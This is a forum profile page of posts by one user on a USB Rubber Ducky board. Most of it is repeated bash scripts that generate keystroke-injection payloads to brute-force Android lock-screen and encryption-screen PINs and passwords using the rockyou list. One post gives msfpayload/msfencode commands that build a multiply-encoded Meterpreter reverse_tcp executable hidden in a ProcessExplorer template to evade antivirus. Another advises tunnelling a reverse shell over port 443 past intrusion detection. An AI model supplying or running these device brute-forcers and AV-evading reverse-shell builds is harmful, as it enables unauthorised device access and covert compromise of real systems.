
CaptainHooligan

Active Members
  • Posts

    12
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by CaptainHooligan

  1. Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.
#!/bin/bash
#
# Payload-Generator version 1.0
# This tool is licensed under the GPLv3. Currently maintained by
# James Luther (CaptainHooligan)
#
# This tool is used to generate payloads for the USB Rubber Ducky
#
# Flow: the top-level code at the bottom checks for uid 0, then calls
# pre() on a first run or main() on later runs. The menus are drawn with
# dialog(1); the text files they produce are passed to duckencode.jar.
#
# ========================================================================
# Main Menu
# Shows the top-level menu and dispatches on the selected tag.
# ========================================================================
main () {
  # dialog prints the chosen tag on stderr, which is redirected to a file
  # and read back on the next line.
  # NOTE(review): /tmp/menuitem.$$ is a predictable, PID-based name in a
  # world-writable directory and the script only runs as uid 0, so another
  # local user can pre-create that path. A mktemp-created file removed by a
  # trap would close this.
  dialog --backtitle "Ducky Payload Generator" --title "Main Menu" \
    --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." \
    15 45 4 \
    Password "Brute Force Password" \
    Pin "Brute Force Pin" \
    About "Display About" \
    Exit "Quit " 2>/tmp/menuitem.$$
  menuitem=`cat /tmp/menuitem.$$`
  # $? here is the status of the assignment above (the cat), not of dialog;
  # opt is not read anywhere in this script.
  opt=$?
  case $menuitem in
    Pin) Pin;;
    Password) Password;;
    # About re-enters main after the message box, so each visit nests one
    # more call.
    About) dialog --backtitle "Ducky Payload Generator" --title "About" --msgbox "\nThe Ducky Payload Generator is used to generate a number of payloads for the USB Rubber Ducky. As of right now it is just made to brute force Android passwords. Later pin brute forcing, reverse shell payloads, and whatever else we can think of will be added. Until then enjoy!\n\n Version: 1.0\n Licensed Under GPLv3\n Maintainted by CaptainHooligan" 15 70 && clear && main;;
    Exit) clear;;
    # Empty selection (e.g. cancel) or any unknown tag: clear and fall out.
    *) clear;;
  esac
  return
}
# ==========================================================================
# Pin menu
# Lets the user pick the encryption-screen or lock-screen variant and
# builds the corresponding text file and .bin in the current directory.
# ==========================================================================
Pin () {
  # Same stderr-to-temp-file pattern (and the same predictable path) as main.
  dialog --backtitle "Ducky Payload Generator" --title "Pin Brute Forcer" \
    --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." \
    15 45 4 \
    Encryption "Pin at Encryption Screen" \
    Lock "Pin at Locked Screen" \
    Main "Return to Main Menu" 2>/tmp/menuitem.$$
  menuitem=`cat /tmp/menuitem.$$`
  opt=$?
  case $menuitem in
    # Each branch is one command list. The ';' after the first redirection
    # ends the initial && chain, so the pipeline that follows runs whatever
    # the status of the commands before it.
    # The "DELAY 5000" line is written to android_brute-force_0000-9999.txt,
    # a scratch file removed at the end of the chain; the file handed to
    # duckencode.jar is the one the pipeline appends to with >>.
    # {0000..9999} is bash brace expansion; '0~1' and '0~5' are GNU sed
    # first~step addresses (every line / every 5th line).
    Encryption)
      clear && echo "Generating Encryption Screen Pin Brute Forcer Payload ..." && echo DELAY 5000 > android_brute-force_0000-9999.txt;
      echo {0000..9999} | xargs -n 1 echo STRING | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android_brute-force_encryption.txt &&
        java -jar duckencode.jar -i android_brute-force_encryption.txt &&
        mv inject.bin android_brute-force_encryption.bin &&
        rm android_brute-force_0000-9999.txt &&
        ls -lart android_brute-force_encryption.*;;
    Lock)
      clear && echo "Generating Lock Screen Pin Brute Forcer Payload ... " && echo DELAY 5000 > android_brute-force_0000-9999.txt;
      echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_lock.txt &&
        java -jar duckencode.jar -i android_brute-force_lock.txt &&
        mv inject.bin android_brute-force_lock.bin &&
        rm android_brute-force_0000-9999.txt &&
        ls -lart android_brute-force_lock.*;;
    Main) clear && main;;
    *) clear ;;
  esac
  return
}
# =========================================================================
# This is where the Password Brute Forcer Menu is processed.
# Dispatches to Pword_Enc or Pword_Lck, or returns to the main menu.
# =========================================================================
Password () {
  # Same stderr-to-temp-file pattern (and the same predictable path) as main.
  dialog --backtitle "Ducky Payload Generator" --title "Password Brute Forcer" \
    --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." \
    15 45 4 \
    Encryption "Password at Encryption Screen" \
    Lock "Password at Locked Screen" \
    Main "Return to Main Menu" 2>/tmp/menuitem.$$
  menuitem=`cat /tmp/menuitem.$$`
  opt=$?
  case $menuitem in
    Encryption) clear && Pword_Enc ;;
    Lock) clear && Pword_Lck ;;
    Main) clear && main ;;
    *) clear ;;
  esac
  return
}
# ==========================================================================
# Password Encryption Screen Brute Forcer
# Reads the first 5000 lines of rockyou.txt from the current directory,
# writes android-pword-encryption.txt and encodes it to
# android-pword-encryption.bin.
# ==========================================================================
Pword_Enc () {
  echo "Generating Encryption Screen Password Brute Forcer ..."
  echo " "
  # Header line is written with '>' (truncate); the pipeline then appends.
  echo DELAY 5000 > android-pword-encryption.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android-pword-encryption.txt
  # No status checks here: each step runs even if the previous one failed.
  java -jar duckencode.jar -i android-pword-encryption.txt
  mv inject.bin android-pword-encryption.bin
  clear && ls -lart android-pword-encryption.*
  return
}
# ==========================================================================
# Password Lock Screen Brute Forcer
# Same as Pword_Enc, with an extra WAIT marker after every 5th entry that
# the last sed expands into four DELAY 5000 / ENTER pairs.
# ==========================================================================
Pword_Lck () {
  echo "Generating Lock Screen Password Brute Forcer ..."
  echo " "
  echo DELAY 5000 > android-pword-lock.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android-pword-lock.txt
  java -jar duckencode.jar -i android-pword-lock.txt
  mv inject.bin android-pword-lock.bin
  clear && ls -lart android-pword-lock.*
  return
}
# =====================================================================
# Prerequisite Checker
# Looks for duckencode.jar, bzip2 and wget (exit 1 if one is missing),
# downloads and unpacks the rockyou list into the current directory,
# writes "1" to $HOME/.payloadgenerator and then opens the main menu.
# =====================================================================
pre () {
  echo -e "Verifying prerequisites are installed ... "
  echo ""
  # find / walks the whole filesystem and prints the path of every match,
  # so duckdir may hold several lines and names the jar itself rather than
  # its directory.
  duckdir=`find / -name duckencode.jar`
  if [ -z "$duckdir" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
  else
    echo "Duckencode.jar prerequisite met."
  fi
  duckinpath=`which duckencode.jar`
  if [ -z "$duckinpath" ] ; then
    # NOTE(review): the search result is appended to PATH unquoted and
    # unvalidated while running as uid 0. The same pattern is used for
    # bzip2 and wget below; `command -v` would check for those tools
    # without searching the filesystem or touching PATH.
    PATH=$PATH:$duckdir
  fi
  bundir=`find / -name bzip2`
  if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
  else
    echo "Bzip2 prerequisite met."
  fi
  buninpath=`which bzip2`
  if [ -z "$buninpath" ] ; then
    PATH=$PATH:$bundir
  fi
  wgetdir=`find / -name wget`
  if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
  else
    echo "Wget prerequisite met."
  fi
  wgetinpath=`which wget`
  if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:$wgetdir
  fi
  echo ""
  echo ""
  echo -e "Verify connection to internet and press [Enter]."
  # Bare read: waits for Enter, input is discarded.
  read
  echo ""
  echo ""
  echo -e "Downloading rockyou password list. This can take some time ..."
  echo ""
  echo ""
  # NOTE(review): fetched over plain http with no checksum or signature
  # check and unpacked as uid 0, so the content is whatever the network
  # path returns. Compare against a pinned digest
  # (<EXPECTED_SHA256 - placeholder, not given on this page>) before
  # unpacking. Neither command's exit status is checked.
  wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
  bunzip2 rockyou.txt.bz2
  echo ""
  # First-run marker read by the top-level code below.
  echo 1 > $HOME/.payloadgenerator
  echo "All Prerequisites met. To continue press [Enter]."
  read
  main
  return
}
# ==========================================================================
# Actual program running
# ==========================================================================
clear
echo " "
# id prints "uid=N(name) ..."; sed drops everything from the first '(' on,
# leaving "uid=0" for root.
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
  echo "Sorry, you need super user access to run this script."
  exit 1
fi
echo " "
echo "Checking to see if you've met prerequisites before ..."
echo " "
# NOTE(review): the existence test uses /root/.payloadgenerator while the
# read here and the write in pre() use $HOME/.payloadgenerator; the two
# agree only when HOME is /root.
if [ -f /root/.payloadgenerator ]
then
  check=`cat $HOME/.payloadgenerator`
  case $check in
    1) main;;
    0) pre;;
    *) pre;;
  esac
else
  pre
fi
  2. Good call! As always the more research you do on a target the better prepared you can be.
  3. Great share! Just as mentioned above, some AV solutions include a Host Based Security System (HBSS) which can whitelist hardware as well as software. In an environment that uses all Dell keyboards or just specific ones that do not use generic drivers this attack would be defeated.
  4. That was pretty much the point I was trying to make: there is always a way around whatever security implementations you run into. The duck does appear as a HID, which means we have to deal with whatever user limits we run into. If the security implementation has application whitelisting, the download will not matter, as the .exe will not be allowed to run. Typically, in a locked environment, downloading is limited to power users or administrators. Either way, know the environment and plan accordingly, as there is always a way when thinking outside the box.
  5. It doesn't really matter what limitations are set on users. There will always be some way to bypass security in one way or another. For example: a robust firewall solution combined with application whitelisting, limited permissions and USB mass storage disabled means you aren't going to be able to download a file, nor will you be able to bring one in.
  6. This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc. Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here: https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing
  7. An easy first thought: can these PCs access the internet from behind the routers and firewall? If so, just run a secure reverse shell over 443. Some IDS will look at the TCP stream and see the amount of traffic as anomalous, but most will see encrypted traffic and ignore it.
  8. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.
#!/bin/bash
# Flat script: prints a banner, requires uid 0, looks for duckencode.jar,
# bzip2 and wget, downloads the rockyou list into the current directory,
# builds rock-android.txt from its first 5000 lines and passes that file
# to duckencode.jar.
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
# id prints "uid=N(name) ..."; sed drops everything from the first '(' on,
# leaving "uid=0" for root.
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
  echo "Sorry, you need super user access to run this script."
  exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
# find / walks the whole filesystem and prints the path of every match,
# so duckdir may hold several lines and names the jar itself rather than
# its directory.
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
  echo "Duckencode.jar not found on system. Please verify you have this installed."
  exit 1
else
  echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
  # NOTE(review): the search result is appended to PATH unquoted and
  # unvalidated while running as uid 0. The same pattern is used for bzip2
  # and wget below; `command -v` would check for those tools without
  # searching the filesystem or touching PATH.
  PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
  echo "Bzip2 not found on system. Please verify you have this installed."
  exit 1
else
  echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
  PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
  echo "Wget not found on system. Please verify you have this installed."
  exit 1
else
  echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
  PATH=$PATH:$wgetdir
fi
echo ""
echo ""
# Unfinished target-selection menu, left commented out by the author.
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
# Bare read: waits for Enter, input is discarded.
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
# NOTE(review): fetched over plain http with no checksum or signature
# check and handled as uid 0, so the content is whatever the network path
# returns. Compare against a pinned digest
# (<EXPECTED_SHA256 - placeholder, not given on this page>) before
# unpacking. Neither command's exit status is checked.
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
# Header line is written with '>' (truncate); the pipeline then appends.
# '0~5' and '0~1' are GNU sed first~step addresses (every 5th line / every
# line); the last sed expands each WAIT marker into four DELAY 5000 / ENTER
# pairs.
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
# Printed unconditionally; the pipeline's status is not checked.
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
  9. Check out dSploit. It is an open source project similar to this.
  10. I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example: [CODE] msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe [/CODE] That sometimes still gets caught, which is when I use a custom template, which isn't too hard to do. Any Windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on, and Sysinternals has a free download. All you need to do to run that is: [CODE] wget http://download.sysinternals.com/Files/ProcessExplorer.zip unzip ProcessExplorer.zip msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5 [/CODE] As was mentioned in previous posts, msfvenom is more updated than msfencode, but when using a custom template (any Windows executable) usually there is no problem at all bypassing AV.
  11. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. ** Edit ** Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.
#!/bin/bash
# Flat script: prints a banner, requires uid 0, looks for duckencode.jar,
# bzip2 and wget, downloads the rockyou list into the current directory,
# builds rock-android.txt from its first 5000 lines and passes that file
# to duckencode.jar.
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
# id prints "uid=N(name) ..."; sed drops everything from the first '(' on,
# leaving "uid=0" for root.
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
  echo "Sorry, you need super user access to run this script."
  exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
# find / walks the whole filesystem and prints the path of every match,
# so duckdir may hold several lines and names the jar itself rather than
# its directory.
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
  echo "Duckencode.jar not found on system. Please verify you have this installed."
  exit 1
else
  echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
  # NOTE(review): the search result is appended to PATH unquoted and
  # unvalidated while running as uid 0. The same pattern is used for bzip2
  # and wget below; `command -v` would check for those tools without
  # searching the filesystem or touching PATH.
  PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
  echo "Bzip2 not found on system. Please verify you have this installed."
  exit 1
else
  echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
  PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
  echo "Wget not found on system. Please verify you have this installed."
  exit 1
else
  echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
  PATH=$PATH:$wgetdir
fi
echo ""
echo ""
# Unfinished target-selection menu, left commented out by the author.
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
# Bare read: waits for Enter, input is discarded.
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
# NOTE(review): fetched over plain http with no checksum or signature
# check and handled as uid 0, so the content is whatever the network path
# returns. Compare against a pinned digest
# (<EXPECTED_SHA256 - placeholder, not given on this page>) before
# unpacking. Neither command's exit status is checked.
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
# Header line is written with '>' (truncate); the pipeline then appends.
# '0~5' and '0~1' are GNU sed first~step addresses (every 5th line / every
# line); the last sed expands each WAIT marker into four DELAY 5000 / ENTER
# pairs.
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
# Printed unconditionally; the pipeline's status is not checked.
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
[/CODE]